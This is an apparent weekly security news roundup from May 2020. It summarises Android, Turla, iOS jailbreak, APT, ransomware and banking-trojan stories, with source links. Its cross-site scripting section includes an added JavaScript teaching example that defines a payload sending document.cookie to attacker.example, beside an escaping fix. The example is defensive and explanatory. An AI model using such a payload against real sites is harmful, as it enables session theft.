Beyond Information Security

New Android Flaw Affecting Over 1 Billion Phones Let Attackers Hijack Apps

Remember Strandhogg?

Strandhogg is a security vulnerability in Android that malicious apps can exploit to masquerade as any other app installed on a targeted device and display fake interfaces to the user, tricking them into giving away sensitive information. Late last year, at the time of its public disclosure, researchers also confirmed that some attackers were already exploiting the flaw in the wild to steal users’ banking and other login credentials, as well as to spy on their activities. The same team of Norwegian cybersecurity researchers today unveiled details of a new critical vulnerability (CVE-2020-0096) in the Android operating system that could allow attackers to carry out a much more sophisticated version of the Strandhogg attack.

Source: The hacker news / Bleeping computer / Dark reading / Threatpost / Securityweek

Link: https://thehackernews.com/2020/05/stranhogg-android-vulnerability.html

Link: https://www.bleepingcomputer.com/news/security/critical-android-bug-lets-malicious-apps-hide-in-plain-sight/

Link: https://www.darkreading.com/vulnerabilities---threats/strandhogg-20-emerges-as-evil-twin-to-android-threat/d/d-id/1337916

Link: https://threatpost.com/strandhogg-2-critical-bug-android-app-hijacking/156058/

Link: https://www.securityweek.com/strandhogg-20-vulnerability-allows-hackers-hijack-android-devices


New ComRAT Malware Uses Gmail to Receive Commands and Exfiltrate Data

Cybersecurity researchers today uncovered a new advanced version of ComRAT backdoor, one of the earliest known backdoors used by the Turla APT group, that leverages Gmail’s web interface to covertly receive commands and exfiltrate sensitive data.

“ComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020,” cybersecurity firm ESET said in a report shared with The Hacker News. “We identified at least three targets: two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region.” Turla, also known as Snake, has been active for over a decade, with a long history of watering hole and spear-phishing campaigns against embassies and military organizations since at least 2004. The group’s espionage platform started off as Agent.BTZ in 2007 before evolving into ComRAT, gaining additional capabilities along the way to achieve persistence and to steal data from the local network.

Source: The hacker news / Bleeping computer / Dark reading / Threatpost / Infosecurity magazine

Link: https://thehackernews.com/2020/05/gmail-malware-hacker.html

Link: https://www.bleepingcomputer.com/news/security/russian-cyberspies-use-gmail-to-control-updated-comrat-malware/

Link: https://www.darkreading.com/vulnerabilities---threats/turla-backdoor-adds-gmail-web-interface-for-command-and-control/d/d-id/1337913

Link: https://threatpost.com/turla-apt-revamps-comrat/156051/

Link: https://www.infosecurity-magazine.com/news/version-turla-malware-threat/


New Tool Can Jailbreak Any iPhone and iPad Using An Unpatched 0-Day Bug

The hacking team behind the “unc0ver” jailbreaking tool has released a new version of the software that can unlock every single iPhone, including those running the latest iOS 13.5 version. Calling it the first zero-day jailbreak to be released since iOS 8, unc0ver’s lead developer Pwn20wnd said “every other jailbreak released since iOS 9 used 1day exploits that were either patched in the next beta version or the hardware.”

The group did not specify which vulnerability in iOS was exploited to develop the latest version.

Source: The hacker news / Threatpost / Securityweek

Link: https://thehackernews.com/2020/05/iphone-ios-jailbreak-tools.html

Link: https://threatpost.com/new-ios-jailbreak-tool-works-on-iphone-models-ios-11-to-ios-13-5/156045/

Link: https://www.securityweek.com/jailbreak-tool-updated-unlock-iphones-running-ios-135


Iranian APT Group Targets Governments in Kuwait and Saudi Arabia

Today, cybersecurity researchers shed light on an Iranian cyber espionage campaign directed against critical infrastructure in Kuwait and Saudi Arabia.

Bitdefender said the intelligence-gathering operations were conducted by Chafer APT (also known as APT39 or Remix Kitten), a threat actor known for its attacks on telecommunication and travel industries in the Middle East to collect personal information that serves the country’s geopolitical interests.

“Victims of the analyzed campaigns fit into the pattern preferred by this actor, such as air transport and government sectors in the Middle East,” the researchers said in a report (PDF) shared with The Hacker News, adding at least one of the attacks went undiscovered for more than a year and a half since 2018.

“The campaigns were based on several tools, including ‘living off the land’ tools, which makes attribution difficult, as well as different hacking tools and a custom-built backdoor.”

Source: The hacker news / Bitdefender whitepaper / Threatpost

Link: https://thehackernews.com/2020/05/iran-hackers-kuwait.html

Link: https://www.bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf

Link: https://threatpost.com/chafer-apt-hits-middle-east-govs-with-latest-cyber-espionage-attacks/156002/


(Last) Week in Ransomware – May 22nd 2020 – Constantly Innovating

Ransomware operators continue to leak data stolen from their victims and to develop new ways of infecting victims without being detected by security software. This week, we saw Snake ransomware leak data from Fresenius Medical Care, and REvil claimed to have a buyer for the alleged data on President Trump. Many think, though, that this was nothing more than a PR stunt, or that the group never had the data in the first place. In addition, we saw an interesting technique used by the Ragnar Locker ransomware: the operators deploy a virtual machine on the victim host and run the encryptor inside it, so that the encryption process is hidden from security software running on the host.

Source: Bleeping computer / Securityweek / SOPHOS blog

Link: https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-may-22nd-2020-constantly-innovating/

Link: https://www.bleepingcomputer.com/news/security/ransomware-encrypts-from-virtual-machines-to-evade-antivirus/

Link: https://www.securityweek.com/ragnar-locker-ransomware-uses-virtual-machines-evasion

Link: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/


Security 101: Cross-Site Scripting

In cyber security, attention is concentrated on the new — zero-day exploits, for example, are big news and big business. But old threats can still cause big problems for organizations, even when those threats are almost old enough to legally have a drink to celebrate their victories. Cross-site scripting, or XSS, was first described by Microsoft engineers on January 16, 2000. By 2007, it was considered the most common exploit for web-based applications, and in 2020 it is still one of the most common, and most dangerous, exploit techniques. So what, exactly, is XSS, and why is it still something we worry about today?
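To make the "what is XSS" question concrete, here is an added example (not code from the Dark Reading article) of the simplest form, reflected XSS: a search page that echoes the user's query back into its HTML. The page template, the escapeHtml helper and the attacker payload are all constructed for this illustration.

```javascript
// Added example: reflected cross-site scripting, the vulnerable sink beside
// its fixed form. Nothing here is from the article; the page, helper names
// and payload are constructed for illustration.

// Encode the five characters that can change how the browser parses HTML.
// Order matters: '&' must be encoded first so later entities are not doubled.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query string lands in the HTML body verbatim, so a query
// that contains markup closes the <p> and starts its own <script> block.
function renderUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}

// Fixed: the same template with output encoding applied at the HTML-body sink.
// The browser now shows the payload as text instead of executing it.
function renderSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Crude check used only to show the difference between the two renderers:
// did a <script> tag that the template itself never wrote end up in the page?
function hasInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input: the classic cookie-stealing payload a scanner
// or an attacker would put in the "q" parameter of the search URL.
const PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

console.log("unsafe:", renderUnsafe(PAYLOAD)); // <script> survives intact
console.log("safe:  ", renderSafe(PAYLOAD));   // rendered as inert text
```

HTML-body encoding is the right fix only for this sink. Data reflected into an attribute value, a JavaScript string, a URL or a CSS context needs the encoding appropriate to that context, and a Content Security Policy that disallows inline scripts limits the damage when an encoding step is missed.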

Source: Dark reading

Link: https://www.darkreading.com/theedge/security-101-cross-site-scripting/b/d-id/1337891


Silent Night: A New Malware-as-a-Service Banking Trojan Analyzed

Silent Night is a new, sophisticated and heavily obfuscated Zloader/Zbot banking trojan derived from ZeuS. In March 2020, both FireEye and IBM reported a malicious campaign targeting COVID-19 financial compensation schemes. FireEye called the malware payload ‘SILENTNIGHT’; IBM described it as a ZeuS Sphinx/Terdot variant. Together they are right: Silent Night is a new ZeuS derivative, currently being offered under the malware-as-a-service (MaaS) model.

Source: Securityweek / Malwarebytes

Link: https://www.securityweek.com/silent-night-new-malware-service-banking-trojan-analyzed

Link: https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf


‘Coronavirus Report’ Emails Spread NetSupport RAT, Microsoft Warns

A recent spear-phishing campaign has been spotted spreading a weaponized copy of NetSupport Manager, a legitimate remote access tool (RAT) used for troubleshooting and tech support. The attackers use the ongoing coronavirus pandemic as a lure, together with malicious Excel documents, to convince victims to execute the RAT. Researchers with Microsoft’s security intelligence team said this week that the ongoing campaign started on May 12 and has used several hundred unique malicious Excel 4.0 attachments thus far, a trend the researchers said they have seen steadily increase over the past month. “The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload,” said the researchers in a series of tweets. “For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.”

Source: Threatpost / Infosecurity magazine

Link: https://threatpost.com/coronavirus-emails-netsupport-rat-microsoft/156026/

Link: https://www.infosecurity-magazine.com/news/microsoft-warns-of-massive-covid19/


Secjuice Squeeze Volume 25

Welcome to the 25th edition of the Secjuice Squeeze, a curated selection of interesting security articles and infosec news that you may have missed, lovingly curated for you on a weekly basis. This week’s volume compiled by Secjuice writers Prasanna, Devesh Chande, Mike Peterson, Manmeet Singh Bhatia, Sinwindie, Thunder-Son, Miguel Calles, and Hartoyo Wahyu.

Source: Secjuice

Link: https://www.secjuice.com/infosec-news-and-events-squeeze-vol-25/


Beginners Cybersecurity (4) – Intrusion

Welcome to my cybersecurity guide for beginners. In my (Andy74) first article, I gave an overview of the different phases of attack. This article focuses on the reason that everyone wants to be a hacker: intrusion.

Source: Secjuice

Link: https://www.secjuice.com/cybersecurity-for-beginners-part-4/

Link: https://www.secjuice.com/cybersecurity-for-beginners-part-3-weaponization/

Link: https://www.secjuice.com/reconnaissance-for-beginners/

Link: https://www.secjuice.com/penetration-testing-for-beginners-part-1-an-overview/